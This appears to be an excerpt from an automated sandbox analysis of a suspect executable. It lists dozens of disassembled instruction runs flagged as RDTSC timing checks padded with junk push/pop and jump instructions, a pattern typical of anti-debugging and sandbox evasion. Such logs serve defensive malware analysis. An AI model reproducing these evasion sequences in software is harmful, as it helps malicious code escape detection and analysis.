                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5524E0 second address: 552503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A13h 0x00000007 jmp 00007F8B146C0A0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552503 second address: 552524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jne 00007F8B151F0E38h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8B151F0E36h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E39 second address: 551E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8B146C0A06h 0x0000000a popad 0x0000000b jmp 00007F8B146C0A0Fh 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E58 second address: 551E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F8B151F0E42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E67 second address: 551E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5567E6 second address: 556800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556800 second address: 55681A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B146C0A10h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55681A second address: 55681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55681E second address: 556824 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556824 second address: 55682A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55682A second address: 55682E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55682E second address: 556832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556832 second address: 556851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556851 second address: 556864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8B151F0E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556864 second address: 556871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F8B146C0A06h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556871 second address: 556880 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555B25 second address: 555B2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555B2B second address: 555B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8B151F0E43h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8B151F0E43h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F8B151F0E44h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555B72 second address: 555B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555CD3 second address: 555CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555E69 second address: 555E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5560E1 second address: 5560E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55639D second address: 5563A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8B146C0A06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5563A7 second address: 5563EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8B151F0E49h 0x0000000f jmp 00007F8B151F0E47h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5563EA second address: 5563F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C79D second address: 55C7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C7A1 second address: 55C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnp 00007F8B146C0A06h 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C7AF second address: 55C7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C7B5 second address: 55C7D4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8B146C0A06h 0x00000008 ja 00007F8B146C0A06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jnl 00007F8B146C0A06h 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C7D4 second address: 55C7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C7DA second address: 55C7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502F3F second address: 502F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5669E5 second address: 5669EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56585F second address: 565879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8B151F0E3Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565E21 second address: 565E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007F8B146C0A13h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8B146C0A0Bh 0x00000016 jp 00007F8B146C0A0Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5663CC second address: 5663D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5663D2 second address: 5663D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5663D8 second address: 5663DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AC79 second address: 56AC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B146C0A14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569D9C second address: 569DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569DA0 second address: 569DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569DAF second address: 569DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0A2 second address: 56A0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jo 00007F8B146C0A06h 0x0000000c jmp 00007F8B146C0A10h 0x00000011 jg 00007F8B146C0A06h 0x00000017 jmp 00007F8B146C0A19h 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 jmp 00007F8B146C0A18h 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0FD second address: 56A105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A105 second address: 56A10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A3D6 second address: 56A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A3DC second address: 56A3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A7DA second address: 56A7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A7DE second address: 56A7F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A16h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A7F8 second address: 56A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A802 second address: 56A806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A806 second address: 56A80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A80A second address: 56A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jo 00007F8B146C0A06h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A81B second address: 56A82F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jl 00007F8B151F0E42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F86D second address: 56F890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8B146C0A0Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F8B146C0A06h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F890 second address: 56F89A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F89A second address: 56F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F8A0 second address: 56F8C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8B151F0E47h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5776AB second address: 5776AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5776AF second address: 5776F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B151F0E44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F8B151F0E36h 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F8B151F0E49h 0x00000019 jnp 00007F8B151F0E36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5776F6 second address: 577722 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B146C0A06h 0x00000008 jmp 00007F8B146C0A0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F8B146C0A0Ch 0x0000001c jnp 00007F8B146C0A06h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57788C second address: 577898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F8B151F0E36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577898 second address: 57789E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57789E second address: 5778AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8B151F0E36h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577B61 second address: 577B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577B6C second address: 577B76 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B151F0E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577B76 second address: 577B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jnc 00007F8B146C0A06h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577E4E second address: 577E5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E42h 0x00000008 jns 00007F8B151F0E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577E5E second address: 577E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5782AE second address: 5782C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E45h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5783F6 second address: 5783FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5783FA second address: 578400 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578400 second address: 57841E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146C0A17h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578C67 second address: 578C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABAB5 second address: 4ABADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABADB second address: 4ABADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABADF second address: 4ABB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Fh 0x00000007 je 00007F8B146C0A06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8B146C0A0Dh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABB09 second address: 4ABB0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABB0D second address: 4ABB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABB1B second address: 4ABB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF06 second address: 57EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F8B146C0A11h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF1E second address: 57EF25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590B0F second address: 590B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590B15 second address: 590B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590B19 second address: 590B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F8B146C0A11h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590B37 second address: 590B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590B3D second address: 590B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5904EC second address: 5904F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59066D second address: 590671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592884 second address: 592889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5929D6 second address: 5929DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5929DA second address: 5929F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B151F0E36h 0x00000008 jne 00007F8B151F0E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599102 second address: 59910D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F8B146C0A06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B91E second address: 59B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B922 second address: 59B92C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B146C0A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B92C second address: 59B932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B932 second address: 59B936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B936 second address: 59B93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B93A second address: 59B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC622 second address: 5AC63E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8B151F0E41h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
